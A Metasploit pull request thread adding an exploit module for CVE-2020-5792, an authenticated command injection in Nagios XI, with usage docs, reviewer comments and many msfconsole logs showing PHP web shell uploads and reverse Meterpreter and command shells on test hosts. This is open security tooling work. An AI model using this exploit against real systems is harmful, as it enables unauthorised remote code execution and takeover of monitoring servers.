Add Nagios XI snmptrap RCE and docs (CVE-2020-5792)
rapid7/metasploit-framework pull request #14699
Opened 2021-02-01 22:50 UTC by kalba-security

## About
This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-5792) in Naxios XI version 5.7.3 (and possibly older versions) to achieve remote code execution as the apache user. The check method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Naxios XI version 5.7.3 (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/FstbNexJNZ.php?T=<cmd>`
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42758) at 2021-02-01 11:19:46 -0500
[*] Command Stager progress - 100.00% done (773/773 bytes)
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php' on the target

meterpreter > 
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/wMwKGRHf.php?W=<cmd>`
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41607) at 2021-02-01 11:21:12 -0500
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

2021-02-06 06:04 UTC, bcoles commented
> This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-5792) in Naxios XI version 5.7.3 (and possibly older versions)

My guess is that it affects 5.5.0 to 5.7.3.

This is exploitable in 5.5.0 but not exploitable in 5.4.10. There were only three versions after 5.4.10 in the 5.4.x branch (5.4.13, 5.4.12, 5.4.11).

# NagiosXI 5.6.7 (success)

```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=mb1emvl9tbj6e8lv3b5hbi9ea2;", "nagiosxi=c62jlco6c2rcvcl5nvegrgpa12;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.7
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/RIzQZFGKjxRZ.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/RIzQZFGKjxRZ.php?I=<cmd>`
[*] Sending stage (980808 bytes) to 10.1.1.114
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 2 opened (10.1.1.117:4444 -> 10.1.1.114:32964) at 2021-02-06 00:39:59 -0500
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/RIzQZFGKjxRZ.php' on the target

meterpreter > 
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/RIzQZFGKjxRZ.php

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.1.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.5.9 (success)

```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=ras66asjc7f4tuuibbqh34mlc6;", "nagiosxi=i24jra3tl108cqlmvlo9ea0906;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.9
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/qbnpzmrsoSLF.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/qbnpzmrsoSLF.php?Q=<cmd>`
[*] Sending stage (980808 bytes) to 10.1.1.116
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 2 opened (10.1.1.117:4444 -> 10.1.1.116:45868) at 2021-02-06 00:52:24 -0500
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/qbnpzmrsoSLF.php' on the target

meterpreter > 
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/qbnpzmrsoSLF.php

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.1.3.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.5.0 (success)

```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run 

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=8jh0cqm8m2nvb8moip81t8dfj3;", "nagiosxi=kud4q2e6usfu01iv045r3if5g1;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.0
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/AKztEtUkw.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/AKztEtUkw.php?o=<cmd>`
[*] Sending stage (980808 bytes) to 10.1.1.118
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 3 opened (10.1.1.117:4444 -> 10.1.1.118:37570) at 2021-02-06 01:00:23 -0500
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/AKztEtUkw.php' on the target

meterpreter > 
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/AKztEtUkw.php

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.3.3.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.4.10 (fail)

```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=iq5don5vtec2t5fvg2ocm2dm17;", "nagiosxi=21m2og2vkfpfioq95gt2qah731;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.10
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/fiUGgjmv.php
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to upload the PHP shell
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/fiUGgjmv.php' on the target
[*] Exploit completed, but no session was created.
```

2021-04-01 16:46 UTC, kalba-security commented
The latest commit includes a rebase so we can use the updated mixin code. I've also updated the vulnerable version range and the docs.
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php?i=<cmd>`
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54824) at 2021-04-01 12:36:52 -0400

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/WwsImAkDSM.php?h=<cmd>`
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:43831) at 2021-04-01 12:37:29 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

2021-04-20 00:08 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
> +Next, the module uploads a simple PHP shell to `includes/components/nxti/index.php` and then executes the payload
This sounds like it is overwriting it, perhaps this might be better wording?

```suggestion
Next, the module uploads a simple PHP shell, overwriting the contents of `includes/components/nxti/index.php`, and then executes the payload
```

2021-04-20 00:09 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
> +Next, the module uploads a simple PHP shell to `includes/components/nxti/index.php` and then executes the payload
Also I'd want to know if this module ends up leaving a backdoor on the system. Ideally we would want to restore the original file if at all possible to prevent us from compromising a client network and leaving them permanently vulnerable post pentest.

2021-04-20 01:06 UTC, gwillcox-r7 requested changes

2021-04-20 01:06 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
> +  def print_message(payload_string)
This is not a great function name in my opinion as it makes it seem like you are overwriting something like one of the default `print_good`  or `print_status` functions. Would be good to rename this function to avoid potential confusion and clashes.

2021-04-20 16:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
> +        'Platform' => %w[linux unix php],
Removed, there is no platform listed under the `Targets` section for `php` so this seems to be unused.

2021-04-20 17:31 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
> +  def print_message(payload_string)
Changed this function name to `alert_exploit_attempt` to avoid naming confusion and potential conflicts.

2021-04-20 17:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
> +via an HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
Reworded for clarity.

2021-04-20 18:18 UTC, gwillcox-r7 commented
Hmm I have been unable to get this to work on Ubuntu targets running both versions 5.5.6 and 5.6.5:

```
msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD                         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[*] 172.21.168.44:80 - The target is not exploitable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.164.122
RHOSTS => 172.21.164.122
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.164.122:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/kfMxuOOeOV.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/kfMxuOOeOV.php?f=<cmd>`
[*] Command Stager progress - 100.00% done (773/773 bytes)
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/kfMxuOOeOV.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.167.69
RHOSTS => 172.21.167.69
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[*] 172.21.167.69:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/tYOekayaA.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/tYOekayaA.php?H=<cmd>`
[*] Command Stager progress - 100.00% done (773/773 bytes)
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/tYOekayaA.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) >
```

2021-04-20 18:53 UTC, gwillcox-r7 commented
Alright interesting, so this module still works on CentOS 7 with a NagiosXI 5.6.5 install but not on Ubuntu 18.04 with the same NagiosXI install available:

```
msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.168.44:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/KBRRRebd.php?z=<cmd>`
[*] Sending stage (980808 bytes) to 172.21.168.44
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Meterpreter session 1 opened (172.21.163.243:4444 -> 172.21.168.44:35554) at 2021-04-20 13:52:24 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > pwd
/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs
meterpreter > 
```

2021-04-20 19:31 UTC, merged

2021-04-20 19:33 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit CVE-2020-5792, an authenticated command injection vulnerability in the `includes/components/nxti/index.php` page of Nagios XI prior to 5.7.4. Successful exploitation results in RCE as the `apache` user.